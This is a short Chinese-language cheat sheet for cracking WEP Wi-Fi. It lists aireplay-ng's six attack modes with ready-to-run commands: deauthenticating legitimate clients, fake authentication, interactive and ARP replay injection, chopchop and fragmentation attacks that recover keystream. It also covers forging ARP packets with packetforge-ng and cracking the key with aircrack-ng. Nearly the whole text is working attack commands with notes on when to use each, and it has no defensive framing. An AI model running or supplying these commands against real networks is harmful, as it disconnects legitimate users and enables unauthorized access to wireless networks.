aireplay-ng的6种攻击模式
抓包!
-0 deautenticate 冲突模式
aireplay-ng -0 10 -a ap -c (合法host 不写全断线) wifi0 (10为次数, 0循环)
强制断开合法客户端与路由器连接,使重新连接,获得验证数据包,产生arp数据.
(当有客户端,无数据,-0 后-3获得arp来攻击)
-1 fakeauth count
无客户端可用伪连接,与ap关联,ap可接受数据包,才能注入
aireplay-ng -1 0 (-e essid) -a ap -h host wifi0 (0延时0秒)
-2 interactive 交互模式
集合抓包,提取数据,发包注入3个功能.
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap -h host wifi0
-p 设置控制帧包含信息(16进制) -c目标mac
无客户端使用,-1伪连接,,交互攻击,生成arp,注入
------------------------
提取包,发送注入数据
aireplay-ng -2 -r myarp(文件名) -x 1024(发包速度) wifi0
无客户端使用,-1伪连接,,获得arp,注入攻击
-3 arp-request 注入攻击模式(抓包,分析,重发)
aireplay-ng -3 -b ap -h 合法的host -x 512 wifi0
有客户端使用,当无data,-0冲突,获得验证包,产生arp注入攻击
-4 chopchop攻击模式 (获得包含密钥xor)
aireplay-ng -4 -b ap -h host wifi0
无客户端使用,-1伪连接,,获得密钥xor
-5 fragment 碎片包攻击模式 获得prga(包含密钥xor)
aireplay-ng -5 -b ap -h host wifi0
packetforge-ng 数据包制造程序
packetforge-ng -0 -a ap -h host wifi0 -k 255.255.255.255 -l 255.255.255.255 -y niam-xor -w myarp
-0 伪装arp数据包 -k 设置目标文件ip和端口 -l 设置源文件ip和端口 -y 从xor读取prga
-w 伪装的arp数据包名
无客户端使用,-1伪连接,用data生成包,获得密钥xor,伪装arp数据包,-2攻击
------------------------------
aircrack-ng -n 64 -b ap name-01.ivs
